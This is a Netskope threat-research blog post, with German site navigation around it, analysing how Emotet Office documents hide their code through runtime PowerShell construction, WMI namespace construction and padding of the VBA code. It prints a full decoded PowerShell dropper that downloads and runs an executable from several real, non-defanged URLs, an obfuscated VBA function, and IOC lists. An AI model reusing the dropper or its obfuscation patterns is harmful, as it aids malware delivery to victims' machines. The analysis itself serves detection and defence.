Netskope wird im Gartner® Magic Quadrant™ für SASE-Plattformen erneut als Leader ausgezeichnet.Holen Sie sich den Bericht

Schließen
Schließen
Ihr Netzwerk von morgen
Ihr Netzwerk von morgen
Planen Sie Ihren Weg zu einem schnelleren, sichereren und widerstandsfähigeren Netzwerk, das auf die von Ihnen unterstützten Anwendungen und Benutzer zugeschnitten ist.
          Erleben Sie Netskope
          Machen Sie sich mit der Netskope-Plattform vertraut
          Hier haben Sie die Chance, die Single-Cloud-Plattform Netskope One aus erster Hand zu erleben. Melden Sie sich für praktische Übungen zum Selbststudium an, nehmen Sie an monatlichen Live-Produktdemos teil, testen Sie Netskope Private Access kostenlos oder nehmen Sie an Live-Workshops teil, die von einem Kursleiter geleitet werden.
            Ein führendes Unternehmen im Bereich SSE. Jetzt ein führender Anbieter von SASE.
            Netskope wird als Leader mit der weitreichendsten Vision sowohl im Bereich SSE als auch bei SASE Plattformen anerkannt
            2X als Leader im Gartner® Magic Quadrant für SASE-Plattformen ausgezeichnet
            Eine einheitliche Plattform, die für Ihre Reise entwickelt wurde
              Generative KI für Dummies sichern
              Generative KI für Dummies sichern
              Erfahren Sie, wie Ihr Unternehmen das innovative Potenzial generativer KI mit robusten Datensicherheitspraktiken in Einklang bringen kann.
                Moderne Data Loss Prevention (DLP) für Dummies – E-Book
                Moderne Data Loss Prevention (DLP) für Dummies
                Hier finden Sie Tipps und Tricks für den Übergang zu einem cloudbasierten DLP.
                  Modernes SD-WAN für SASE Dummies-Buch
                  Modernes SD-WAN für SASE-Dummies
                  Hören Sie auf, mit Ihrer Netzwerkarchitektur Schritt zu halten
                    Verstehen, wo die Risiken liegen
                    Advanced Analytics verändert die Art und Weise, wie Sicherheitsteams datengestützte Erkenntnisse anwenden, um bessere Richtlinien zu implementieren. Mit Advanced Analytics können Sie Trends erkennen, sich auf Problembereiche konzentrieren und die Daten nutzen, um Maßnahmen zu ergreifen.
                        Technischer Support von Netskope
                        Technischer Support von Netskope
                        Überall auf der Welt sorgen unsere qualifizierten Support-Ingenieure mit verschiedensten Erfahrungen in den Bereichen Cloud-Sicherheit, Netzwerke, Virtualisierung, Content Delivery und Software-Entwicklung für zeitnahen und qualitativ hochwertigen technischen Support.
                          Netskope-Video
                          Netskope-Schulung
                          Netskope-Schulungen helfen Ihnen, ein Experte für Cloud-Sicherheit zu werden. Wir sind hier, um Ihnen zu helfen, Ihre digitale Transformation abzusichern und das Beste aus Ihrer Cloud, dem Web und Ihren privaten Anwendungen zu machen.
                            ""
                            Erzielen Sie geschäftlichen Nutzen mit Netskope One SSE
                            Netskope One Security Service Edge (SSE) ermöglicht es Unternehmen, durch die Konsolidierung geschäftskritischer Sicherheitsservices innerhalb der Netskope One-Plattform einen erheblichen Geschäftswert zu erzielen
                              Lassen Sie uns gemeinsam Großes erreichen
                              ""
                              Die partnerorientierte Markteinführungsstrategie von Netskope ermöglicht es unseren Partnern, ihr Wachstum und ihre Rentabilität zu maximieren und gleichzeitig die Unternehmenssicherheit an neue Anforderungen anzupassen.

                                You Can Run, But You Can’t Hide: Detecting Malicious Office Documents

                                Oct 08 2020

                                Summary

                                Malicious Microsoft Office documents are a popular vehicle for malware distribution. Malware families such as Emotet, IcedID, and Dridex use Office documents as their primary distribution mechanism. Several recent Emotet attacks used a novel approach to sending email baits and hosted the malicious documents in cloud apps to increase their success.  

                                At Netskope, we apply a hybrid approach to malicious Office document detection that leverages a combination of heuristics and supervised machine learning to identify malicious code embedded in documents. From August 1st through September 23rd, Netskope’s Advanced Threat platform detected downloads of multiple zero-day Emotet samples distributed as Office document files targeting multiple Netskope customers. The samples revealed a trend of increasingly advanced obfuscation techniques being used to evade signature-based threat detection. This blog post describes the obfuscation techniques used in those samples, the details of which are listed in the IOC section at the end of this post.

                                Multi-layered obfuscation

                                Emotet Office document samples are typically Microsoft Excel spreadsheets or Microsoft Word documents that use WMI (Windows Management Instrumentation) and PowerShell to connect to their C&C servers and download their next stage payloads, which have included TrickBot, QBot, and Ryuk. In this section, we explain how the four Emoted samples listed in the IOC section hide their usage of these windows utilities by obfuscating their VBA code in multiple layers. Multi-layered obfuscation is a tool used by attackers to generate new Emotet documents that evade detection by signature-based AV software. We will use example code extracted from the sample e9afe010343209a2a0f2eb5ec56cdacc throughout this post.

                                The following sections describe three obfuscation techniques used in these samples:

                                • Constructing a PowerShell script at runtime
                                • Constructing WMI namespaces at runtime
                                • VBA logic obfuscation

                                Constructing a PowerShell script at runtime

                                Each of the samples hides the fact that it includes a malicious PowerShell script by constructing the script from an obfuscated string at runtime. The VBA code uses the InlineShapes object to construct the script as follows. The local variable Lauos9455c_0jekm is assigned a value extracted from the  AlternativeText property of an image embedded in the document. The screenshot below shows this code in the debugger, including a preview of the AlternativeText which begins 62378623.

                                Screenshot showing this code in the debugger, which includes a preview of the AlternativeText which begins 62378623.

                                The following screenshot shows a larger snippet of the AlternativeText, which is the encoded PowerShell script.

                                Screenshot showing a larger snippet of the AlternativeText, which is the encoded PowerShell script.

                                At runtime, the alternative text is decoded to the PowerShell script below:

                                $Qky_zcr=('Oj'+('ba'+'44')+'1');
                                &('new'+'-item') $enV:usERprofILE\ix_U0eE\Da3Ipfv\ -itemtype DirECtory;
                                [Net.ServicePointManager]::"SEcUrit`y`pRotO`CoL" = (('tls12'+','+' ')+'tl'+'s'+'11'+(','+' tls'));
                                $P4d5bdi = (('Av'+'b')+('jjxx'+'_')+'b');
                                $Nldikqi=('E'+('2p'+'j7'+'jg'));
                                $Cf_yl7r=$env:userprofile+(('{0}Ix_'+('u0'+'ee')+'{0}Da3i'+'pf'+'v{0'+'}') -f[char]92)+$P4d5bdi+('.'+('ex'+'e'));
                                $Zzddnnl=('F'+'5d'+('l'+'o_y'));
                                $X474fy2=&('n'+'ew-obje'+'ct') NeT.webcLiENt;
                                $Qa9w58w=(('htt'+'p://'+'rese')+('ller-'+'de'+'m')+'o-'+'we'+'bs'+'i'+'te'+'.c'+'o'+'m/'+('di'+'scus')+('s'+'ion/qWWf'+'8F')+('S'+'/*'+'htt')+('ps'+'://w')+'ww'+('.m'+'o'+'ckdumps.c')+'om'+'/'+('t'+'est/'+'Z2pJ/*'+'h')+'tt'+('ps:'+'/')+('/t'+'wi')+('s'+'te')+('rp'+'ri')+('nt'+'.')+('co'+'m'+'/chro')+('me'+'the')+('me/V'+'cr'+'/*')+('h'+'tt')+('p://'+'s')+'im'+('u'+'la')+('tio'+'ns.or'+'g')+'/'+('rw_c'+'om')+('mo'+'n/'+'Kf')+'X2'+('MW/*htt'+'p:/'+'/p'+'la')+'n'+'o'+('s'+'des'+'audese'+'mc')+'a'+'re'+'nc'+'ia'+'.'+'co'+('m/'+'erros/')+'J'+('Ho'+'q/*ht'+'tp')+'s:'+('//viaje'+'-a')+('c'+'hina.')+'c'+'om'+('/wp'+'-')+('ad'+'mi'+'n/A1O8t')+'L'+('/'+'*ht')+('tps'+':/')+('/ce'+'ar')+('acul'+'tura'+'l'+'.'+'com.b')+('r/'+'t')+'u'+('r'+'is'+'mo/oy/'))."SpL`iT"([char]42);
                                $Y6tgzl_=('Un'+('w0m3'+'1'));
                                foreach($Wken8ig in $Qa9w58w){try{$X474fy2."d`ownLoadfi`Le"($Wken8ig, $Cf_yl7r);
                                $Ccx080r=(('Ad'+'bqm8')+'b');
                                If ((&('G'+'et-'+'Item') $Cf_yl7r)."lE`NgTH" -ge 23800) {&('In'+'voke'+'-Item')($Cf_yl7r);
                                $Tla1_sz=(('N'+'k_3m')+'yp');
                                Break;
                                $Ihmn14_=('J'+'f'+('wk'+'uj8'))}}catch{}}$K7wqzcd=('Y'+('joyro'+'y'))

                                When executed, the script will download the next stage payload from the Internet using the WebClient Class of .Net Framework and execute it using Invoke-Item. The URLs from which it downloads the payloads are also obfuscated, referred to by the $Qa9w58w variable.

                                Constructing WMI namespaces at runtime

                                The Emotet samples execute the obfuscated PowerShell scripts using the winmgmt WMI service. To hide the fact that it uses WMI, the sample e9afe010343209a2a0f2eb5ec56cdacc constructs the WMI prefix from the obfuscated string beginning 62378 in the screenshot below.

                                Screenshot showing obfuscated PowerShell script sample, hiding the fact that it uses WMI.

                                After execution, this string is decoded to winmgmts:win32_Process as shown in the following screenshot.

                                Screenshot showing string decoded to winmgmts:win32_Process

                                Next, the VBA script uses the winmgmts:win32_Process class to execute the PowerShell script. 

                                VBA logic obfuscation

                                So far, we have illustrated how the VBA code reconstructs and executes an obfuscated PowerShell script at runtime using WMI. You may have also noticed in the screenshots that the VBA script itself is obfuscated. Each of these samples includes VBA logic obfuscation, which complicates the code to make analysis more difficult. One of the techniques used declares unused variables, redundant function calls, and multiple loops to hide the true function of the code. The following function G__1rwyai__jm7o1 contains 130 lines of code, with only three lines that provide any actual functionality.  Those lines are highlighted in red. The rest of the code acts as a no-op.

                                Function G__1rwyai__jm7o1(Muso_es0hyn6noj)
                                On Error Resume Next
                                Set NBJKS = Languages
                                IdRWRqkldA = Mid _
                                ((Ikf58e3q9ip7zwotaz + Ssvt4yiusol), 232, 2)
                                WBHjwhzz = Mid _
                                ((I4pd7b4xle7y0w + R5iuan37o22ng), 127, 2)
                                lqoNo = Mid _
                                ((Pkbw5ddktssib1vx + Ohov2j5lbu8anezw01), 230, 1)
                                lizKwNK = Mid _
                                ((Vcesgnk2c3lcl25gg + C6bhk3uhkgn5xd_24), 43, 2)
                                pFiWhmDdQ = Mid _
                                ((Lziiqt3t1rwjt0s57 + Vw3n00denjficu902r), 109, 1)
                                Set ouOHId = Languages
                                BPEqdkHsb = Mid _
                                ((Wpsq3ccwaxpl4he + Fdd1jelftnrpblvhbj), 61, 2)
                                BJTsW = Mid _
                                ((Mlfak8nds09 + B0x27y2l2dm9o), 83, 1)
                                ZowKPs = Mid _
                                ((Quzchktgywbd458 + Vhvaqqpvzuk), 226, 1)
                                hTwmLzb = Mid _
                                ((Hn0iw1j4pp2y56laz4 + Yo1kfmofhfdny_v8k), 242, 2)
                                Set nioObds = Languages
                                VZJjLFS = IdRWRqkldA + WBHjwhzz + lqoNo + lizKwNK + pFiWhmDdQ + BPEqdkHsb + BJTsW + ZowKPs + hTwmLzb
                                EYCoQrOrZl = Mid _
                                ((Vrdudxoq9hvfp78y + Ouc57iucylcdy), 70, 1)
                                MwMDn = VZJjLFS + EYCoQrOrZl
                                Qxkjmji8kru6j6qg = CleanString(Muso_es0hyn6noj)
                                Set NBJKS = Languages
                                IdRWRqkldA = Mid _
                                ((C_iv4t8cj873ulf + Y9yg8d127bzs), 232, 2)
                                WBHjwhzz = Mid _
                                ((Osri3jj1bmue + Qbnzw5l5bck8ya), 127, 2)
                                lqoNo = Mid _
                                ((Mz25p71ppu4b7 + Xwecpryohq7hot), 230, 1)
                                lizKwNK = Mid _
                                ((Eldj_jnv1zx8x0 + V3plfrg5jtwd), 43, 2)
                                pFiWhmDdQ = Mid _
                                ((I0irg_ii148itbo + Uvapbxd3co0_r6), 109, 1)
                                Set ouOHId = Languages
                                BPEqdkHsb = Mid _
                                ((Jg6j3qf1y19d_tcw + Uqr9wyrz6qo4aj), 61, 2)
                                BJTsW = Mid _
                                ((Wbtcy3w9x6n1dtdj + Utgbo43sov9), 83, 1)
                                ZowKPs = Mid _
                                ((T9xrgi0__9yhs5di0n + Thobsc1ri3uk), 226, 1)
                                hTwmLzb = Mid _
                                ((R9792j8kfka6 + Ztu1uuaqf4n7eor21), 242, 2)
                                Set nioObds = Languages
                                VZJjLFS = IdRWRqkldA + WBHjwhzz + lqoNo + lizKwNK + pFiWhmDdQ + BPEqdkHsb + BJTsW + ZowKPs + hTwmLzb
                                EYCoQrOrZl = Mid _
                                ((Lxstv9grzr6w + Jhxch9tiak2tftbw6q), 70, 1)
                                MwMDn = VZJjLFS + EYCoQrOrZl
                                O59swm8t67fn_x = Split(Qxkjmji8kru6j6qg, "62378")
                                Set NBJKS = Languages
                                IdRWRqkldA = Mid _
                                ((Ng1idf5vqshp + Atjmbgzhzbsh), 232, 2)
                                WBHjwhzz = Mid _
                                ((Hywah732l6v_2yhzf + Dv0eg7xhmy95eiaj), 127, 2)
                                lqoNo = Mid _
                                ((D_pllxq1zznltssul + Q6gr1o_td5r1n0), 230, 1)
                                lizKwNK = Mid _
                                ((Ub11p59soshj85 + Kk56nozykbm3), 43, 2)
                                pFiWhmDdQ = Mid _
                                ((Qi0mo52q458uzn3 + Ned19oh8svcdnpzcbo), 109, 1)
                                Set ouOHId = Languages
                                BPEqdkHsb = Mid _
                                ((Eu67dc1wr9kzb9z38 + Bwjbb552ydoe), 61, 2)
                                BJTsW = Mid _
                                ((Nlswqyj_yh31_i8bg + R35_4wdsbcmoxime), 83, 1)
                                ZowKPs = Mid _
                                ((Julieyjoormcw81so + J_ts7s0xhyjvuo6r), 226, 1)
                                hTwmLzb = Mid _
                                ((M6quevwof3ppfx8 + N_ej6y4ksqwe), 242, 2)
                                Set nioObds = Languages
                                VZJjLFS = IdRWRqkldA + WBHjwhzz + lqoNo + lizKwNK + pFiWhmDdQ + BPEqdkHsb + BJTsW + ZowKPs + hTwmLzb
                                EYCoQrOrZl = Mid _
                                ((X0hfnix0gip8e21th + Amnbo2hy5cf), 70, 1)
                                MwMDn = VZJjLFS + EYCoQrOrZl
                                W1a_z4cnkx8pbs = Gnhgnzg5etzb + Join(O59swm8t67fn_x, Jmiiqnw195iem4r2i0)
                                Set NBJKS = Languages
                                IdRWRqkldA = Mid _
                                ((K3kozfmj1mc_1rhhk8 + Kgqme01ng9rb), 232, 2)
                                WBHjwhzz = Mid _
                                ((Nvpmkb1ogxvwhxnwr + S0zr59qfp_3fmj), 127, 2)
                                lqoNo = Mid _
                                ((Hqec79jh5it62 + In3zr3ddc3r8ew2wak), 230, 1)
                                lizKwNK = Mid _
                                ((I8giuwtq37ikc + Gdwar7shhonv04yq), 43, 2)
                                pFiWhmDdQ = Mid _
                                ((Gjtpaffhd0ll + Vrph7tewup5e), 109, 1)
                                Set ouOHId = Languages
                                BPEqdkHsb = Mid _
                                ((U60y14ly_buki9r4 + Xh7_u8g29fmwz5), 61, 2)
                                BJTsW = Mid _
                                ((Hlnljqjt_u5q79yv + Ugtxj1i0384x_blh), 83, 1)
                                ZowKPs = Mid _
                                ((A8ugu0xz7p2ql5juz + Nlbbwfmrtr7attia9), 226, 1)
                                hTwmLzb = Mid _
                                ((Brji70nkssrdtdki4 + U0kp5dpg478hhl7rti), 242, 2)
                                Set nioObds = Languages
                                VZJjLFS = IdRWRqkldA + WBHjwhzz + lqoNo + lizKwNK + pFiWhmDdQ + BPEqdkHsb + BJTsW + ZowKPs + hTwmLzb
                                EYCoQrOrZl = Mid _
                                ((Hqcymx6_q932k1m + Ysxxg4zfsnkk), 70, 1)
                                MwMDn = VZJjLFS + EYCoQrOrZl
                                G__1rwyai__jm7o1 = W1a_z4cnkx8pbs
                                Set NBJKS = Languages
                                IdRWRqkldA = Mid _
                                ((Updjczqkaz5e_opj2 + Vq_k0wkqa9lyl4), 232, 2)
                                WBHjwhzz = Mid _
                                ((Fvf2_4simhhyturi5 + Bk73tqr_xzt), 127, 2)
                                lqoNo = Mid _
                                ((Inak35kt3vmiyc2927 + Ssvkt0qczj_g41o), 230, 1)
                                lizKwNK = Mid _
                                ((Vyj4y0lmq9ydq1uj2 + Vr3dsmm3wj3p), 43, 2)
                                pFiWhmDdQ = Mid _
                                ((Njh8jrd72gj5vkm + Zz2py79d2f9q7nb), 109, 1)
                                Set ouOHId = Languages
                                BPEqdkHsb = Mid _
                                ((Aof6j4k3xkdktk8 + Zfwub_7xmdf), 61, 2)
                                BJTsW = Mid _
                                ((Ox_nfz4hfsn + K03n4yvrj7r2), 83, 1)
                                ZowKPs = Mid _
                                ((Mtbtssfxghak1e5r + Xs4qfchs6ztz6zgj), 226, 1)
                                hTwmLzb = Mid _
                                ((Qg2yx_hui23dct2_ + Z_9lnq5ax5x0lt6), 242, 2)
                                Set nioObds = Languages
                                VZJjLFS = IdRWRqkldA + WBHjwhzz + lqoNo + lizKwNK + pFiWhmDdQ + BPEqdkHsb + BJTsW + ZowKPs + hTwmLzb
                                EYCoQrOrZl = Mid _
                                ((Csy2bjsw88m + L4g3zm1hlmk28y), 70, 1)
                                MwMDn = VZJjLFS + EYCoQrOrZl
                                End Function

                                Netskope detection

                                Netskope Advanced Threat Protection provides proactive coverage against zero-day samples of Emotet and other malicious Office documents using both our ML and heuristic-based static analysis engines and our cloud sandbox. The following screenshot shows the detection for ca8512504aab7157566842560e3840af, indicating it was detected by both the heuristic engine and the sandbox.

                                Screenshot showing the detection for ca8512504aab7157566842560e3840af, indicating it was detected by both the heuristic engine and the sandbox.

                                Furthermore, Netskope Advanced Threat Protection also extracts the process flow graph. In the following example, you can see that the Word document used WMI to execute a PowerShell script, which in-turn downloaded and executed the next-stage payload, r_o2c8hj4.exe.

                                Screenshot showing Netskope Advanced Threat Protection's extracted flow graph for a malicious Word doc.

                                Conclusion

                                Netskope Advanced Threat Protection includes a custom Microsoft Office file analyzer and a sandbox to detect malicious Office documents. The Emotet examples examined in this post used multiple layers of obfuscation including runtime PowerShell script construction, WMI prefix construction, and VBA logic obfuscation to evade signature-based detection, but were ultimately detected by both our Office file analyzer and sandbox. The Emotet malware is still actively spreading using new Office documents. We will provide updates on this active threat as it evolves.

                                IOCs

                                Sample 1: e9afe010343209a2a0f2eb5ec56cdacc

                                Dropped executable file

                                C:\Users\admin\AppData\Local\midimap\audiosrv.exe

                                DNS requests

                                DOMAIN reseller-demo-website[.]com

                                Connections  

                                103.91.66[.]11

                                71.72.196[.]159

                                HTTP requests

                                hxxp://reseller-demo-website[.]com/discussion/qWWf8FS/ 

                                hxxp://71.72.196[.]159/iy3SwBYjYwT5Od/

                                Sample 2: 56fa47be4a17de3c7ffb07f73ba811bb 

                                Dropped executable file

                                C:\Users\admin\Wyhzobx\Ca1jhtv\Myf5gg.exe

                                DNS requests

                                crbremen[.]com 

                                Connections

                                81.169.145[.]68 

                                185.215.227[.]107

                                HTTP requests

                                hxxp://crbremen[.]com/WordPress_01/A/  hxxp://185.215.227[.]107:443/3M4OFDMn4Kabotaol/HKxdAz6M4aHMy/9jyHua5slHRXyRO/zWlx3BkR/

                                Sample 3: ca8512504aab7157566842560e3840af 

                                DNS requests

                                cryptokuota[.]com 

                                fgajardo[.]com 

                                Connections

                                94.237.78[.]68 

                                186.64.114[.]45

                                HTTP requests

                                hxxp://cryptokuota[.]com/assets/ayQUtnd403/

                                Sample 4: 1fc0ae9cf2336e3d666238d550333455

                                Dropped executable file

                                C:\Users\admin\AppData\Local\QSHVHOST\RtkPgExt.exe

                                DNS requests

                                academiadotrader[.]net 

                                Connections

                                192.185.215[.]162 

                                174.113.69[.]136 

                                HTTP requests 

                                hxxp://174.113.69[.]136/p9QSwHvC7/zQ0CpvOpVpW2OI/GCdboik8ujcjkMw/X15uf0/q8hZypq2JJF/jbd4qwWcrnkkc1/

                                Thank you to Zhi Xu, Benjamin Chang , Ashwin Vamshi for helping analyze the sample files and contributing to this blog.

                                author image
                                Ghanashyam Satpathy
                                Ghanashyam is a Principal Researcher with the Netskope Efficacy team. His background is building threat detection products using AI/ML technology.
                                Ghanashyam is a Principal Researcher with the Netskope Efficacy team. His background is building threat detection products using AI/ML technology.
                                Verbinden Sie sich mit Netskope

                                Subscribe to the Netskope Blog

                                Sign up to receive a roundup of the latest Netskope content delivered directly in your inbox every month.